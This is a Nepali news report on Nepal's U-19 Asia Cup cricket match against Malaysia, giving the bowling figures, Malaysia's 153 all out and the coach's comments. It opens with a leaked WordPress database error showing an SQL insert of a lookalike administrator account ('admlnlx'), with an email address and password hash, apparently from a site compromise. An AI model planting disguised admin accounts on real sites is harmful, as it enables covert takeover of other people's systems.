WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B09ZRhswgAyeQ5foJcHzdFMSjl6nW80', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 15:27:51', '', 'admlnlx', 'admlnlx')
काठमान्डौं,पुष ३-
श्रीलंकामा जारी एसिसी यू–१९ एसिया कपमा लगातार दोस्रो खेलमा पराजित भएसँगै बाहिरिएको नेपालले समूह चरणको अन्तिम खेलमा मलेसियासँग १५४ रनको लक्ष्य पाएको छ। कोलम्बोमा टस हारेर पहिले ब्याटिङ गरेको मलेसियाले निर्धारित ५० ओभरको खेलमा ४४.४ ओभरमा सबै विकेट गुमाउँदै १५३ रनमा समेटियो।
मलेसियालाई मध्यम स्कोरमा रोक्न नेपालका आदिल खानले ३ तथा सन्दिप लामिछानेले २ र दीपेन्द्रसिंह ऐरीले २-२ विकेट लिए। रोहितकुमार पौडेल, शुभंकर उराउ र पवन सरार्फले १-१ विकेट लिए।
मलेसियाका लागि विरेनदिप सिंहले सर्वाधिक ७५ रन बनाए।
पहिलो खेलमा आयोजक श्रीलंकासँग १ रनको झिनो अन्तरले पराजित भएको नेपाललाई दोस्रो खेलमा भारतले ६ विकेटले हराएको थियो । मलेसियालाई पनि श्रीलंका र भारतले हराएका थिए । प्रतिष्ठाको लडाइँ कोलम्बो उड्नुअघि सेमिफाइनल पुग्ने लक्ष्य बनाएको नेपालका लागि मलेसियाविरुद्धको खेलमा सान्त्वना जित निकाल्ने अवसर छ ।
नेपालका प्रशिक्षक विनोद दासले मलेसियालाई कमजोर आँक्ने गल्ती नगर्ने बताएका थिए । ‘पछिल्लो समय मलेसियाले युवा क्रिकेटमा ठूलो लगानी गरेको छ । मलेसियाका नयाँ खेलाडीहरू राम्रा छन्,’ विनोदको भनाइ थियो, ‘हामी उनीहरूलाई कमजोर आँक्दैनौँ ।’ भारत र श्रीलंकासँग भारी अन्तरले पराजित भएको मलेसियाले नेपालभन्दा कमजोर खेल प्रदर्शन गरेको छ । मलेसियालाई भारतले २ सय ३५ तथा श्रीलंकाले ८ विकेटको फराकिलो अन्तरले पराजित गरेको थियो । जसको फाइदा उठाउने अवसर नेपाललाई छ ।